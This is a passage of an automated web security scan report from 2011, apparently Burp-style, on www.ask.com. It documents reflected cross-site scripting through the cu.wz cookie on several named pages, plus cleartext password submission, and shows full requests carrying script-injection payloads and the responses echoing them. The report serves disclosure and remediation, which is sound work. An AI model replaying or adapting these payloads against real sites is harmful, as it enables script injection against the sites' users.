GET /pictures?o=0&l=dir&qsrc=167&q=xss&v=14 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=xss&search=&qsrc=0&o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0b9561"><script>alert(1)</script>e8deaf81c4c; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjM5LVVUQw%3D%3D&po=0&pp=dir; qc=0; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; wz_sid=084EE34C926D4254193520127E77B26A; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.2.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllPwpcQDkAACJXhwoAAAD4
from-tr: trafrt009iad.io.askjeeves.info
Content-Length: 115762
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:15 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjE1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:15 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
<img src="http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=p&app=a14&l=dir&o=0&sv=0a5c4079&p=pictures&rf=0&ord=3785001&cu.wz=0b9561"><script>alert(1)</script>e8deaf81c4c" height=1 width=1 id="SessionTracker" />
...[SNIP]...

1.9. http://www.ask.com/pictures [cu.wz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23d5a"-alert(1)-"23acc03a791 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pictures?o=0&l=dir&qsrc=167&q=xss&v=14 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=xss&search=&qsrc=0&o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=023d5a"-alert(1)-"23acc03a791; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjM5LVVUQw%3D%3D&po=0&pp=dir; qc=0; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; wz_sid=084EE34C926D4254193520127E77B26A; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.2.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllQQpcQDcAAAZV8RoAAAAm
from-tr: trafrt007iad.io.askjeeves.info
Content-Length: 115582
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:17 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjE3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:17 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
Image();
st.height = 1;
st.width = 1;
st.id = "SessionTracker";
st.src = "http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=p&app=a14&l=dir&o=0&sv=0a5c407a&p=pictures&rf=0&ord=3913624&cu.wz=023d5a"-alert(1)-"23acc03a791";


</script>
...[SNIP]...

1.10. http://www.ask.com/products/display [cu.wz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /products/display

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ae25"-alert(1)-"eb8fc402c26 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/display HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=07ae25"-alert(1)-"eb8fc402c26; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjUxLVVUQw%3D%3D&po=0&pp=dir; qc=0; wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllPQpcQW8AAHONb-gAAADu
from-tr: trafrt001iad.io.askjeeves.info
Content-Length: 39783
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:13 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjEzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:13 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>Advertise - Ask.com</title>


<link href="http://www.ask
...[SNIP]...

WZInfo.pickRedirectDefault = "http://wzus1.ask.com/r?t=p&d=us&s=a&c=adv&app=aoth&l=dir&o=0&sv=0a5c4050&ip=32177b6a&id=CE5A46FFC89898B9F85CCE078C5D5F15&q=&p=0&qs=121&ac=24&g=2b4aqrWUTiqv21&cu.wz=07ae25"-alert(1)-"eb8fc402c26";
WZInfo.pickDefault = "http://wzus1.ask.com/i/b.html?t=p&d=us&s=a&c=adv&app=aoth&l=dir&o=0&sv=0a5c4050&ip=32177b6a&id=CE5A46FFC89898B9F85CCE078C5D5F15&q=&p=0&qs=121&ac=24&g=2b4aqrWUTiqv21&cu.wz=
...[SNIP]...

1.11. http://www.ask.com/settings [cu.wz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /settings

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81bfd"-alert(1)-"d4d6009d874 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /settings HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=081bfd"-alert(1)-"d4d6009d874; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0; __qca=P0-1861158471-1313432937925

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllSwpcQDkAACJXjYUAAAD@
from-tr: trafrt009iad.io.askjeeves.info
Content-Length: 65458
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:27 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjI3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:27 GMT; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
mage();
st.height = 1;
st.width = 1;
st.id = "SessionTracker";
st.src = "http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=h&app=aoth&l=dir&o=0&sv=0a5c404f&p=settings&rf=0&ord=4939452&cu.wz=081bfd"-alert(1)-"d4d6009d874";


</script>
...[SNIP]...

1.12. http://www.ask.com/settings [cu.wz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /settings

Issue detail

The value of the cu.wz cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4aa2"><script>alert(1)</script>6e7e4b15f97 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /settings HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0d4aa2"><script>alert(1)</script>6e7e4b15f97; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0; __qca=P0-1861158471-1313432937925

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllSgpcQW8AAHONd08AAADy
from-tr: trafrt001iad.io.askjeeves.info
Cache-Control: no-cache
Content-Length: 65578
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:26 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjI2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:26 GMT; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
<img src="http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=h&app=aoth&l=dir&o=0&sv=0a5c407d&p=settings&rf=0&ord=4899875&cu.wz=0d4aa2"><script>alert(1)</script>6e7e4b15f97" height=1 width=1 id="SessionTracker" />
...[SNIP]...

1.13. http://www.ask.com/web [cu.wz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /web

Issue detail

The value of the cu.wz cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dc8a"><script>alert(1)</script>01fc5f08645 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /web?q=xss&search=&qsrc=0&o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=04dc8a"><script>alert(1)</script>01fc5f08645; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjAyLVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.1.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_uid=0A42E34A946D4254193520127E77B26A; wz_sid=084EE34C926D4254193520127E77B26A; wz_scnt=1

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TklkvgpcQDgAACSm0SYAAADA
from-tr: trafrt008iad.io.askjeeves.info
Content-Length: 109937
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:26:07 GMT
Connection: close
Set-Cookie: gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:26:07 GMT; Path=/
Set-Cookie: clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:26:07 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-eHNz; Domain=.ask.com; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjA3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:26:07 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   

<title>Ask.com - W
...[SNIP]...
<img src="http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=a&app=a14&l=dir&o=0&sv=0a5c407b&p=web&rf=0&ord=2983056&cu.wz=04dc8a"><script>alert(1)</script>01fc5f08645" height=1 width=1 id="SessionTracker" />
...[SNIP]...

1.14. http://www.ask.com/web [cu.wz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /web

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2e0a"-alert(1)-"b5e3a9ba348 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web?q=xss&search=&qsrc=0&o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0d2e0a"-alert(1)-"b5e3a9ba348; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjAyLVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.1.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_uid=0A42E34A946D4254193520127E77B26A; wz_sid=084EE34C926D4254193520127E77B26A; wz_scnt=1

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TklkwgpcQKMAAFY@ZiAAAAEO
from-tr: trafrt011iad.io.askjeeves.info
Cache-Control: private
Content-Length: 110383
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:26:11 GMT
Connection: close
Set-Cookie: gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:26:11 GMT; Path=/
Set-Cookie: clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:26:11 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-eHNz; Domain=.ask.com; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjExLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:26:11 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   

<title>Ask.com - W
...[SNIP]...
new Image();
st.height = 1;
st.width = 1;
st.id = "SessionTracker";
st.src = "http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=a&app=a14&l=dir&o=0&sv=0a5c4072&p=web&rf=0&ord=3259623&cu.wz=0d2e0a"-alert(1)-"b5e3a9ba348";


</script>
...[SNIP]...

2. Cleartext submission of password  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /settings

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

Request

GET /settings HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0; __qca=P0-1861158471-1313432937925

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllNwpcQDgAACSmEQcAAADE
from-tr: trafrt008iad.io.askjeeves.info
Cache-Control: no-cache
Content-Length: 65232
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:07 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:07 GMT; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
</div>
<form name="myForm2" id="myForm2">
<div id="passsuccessmsg">
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="currentpassword" id="currentpassword" value=""></div>
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="newpassword" id="newpassword" value=""> </div>
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="password" id="password" value=""> </div>
...[SNIP]...

3. Password field submitted using GET method  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ask.com
Path:   /settings

Issue detail

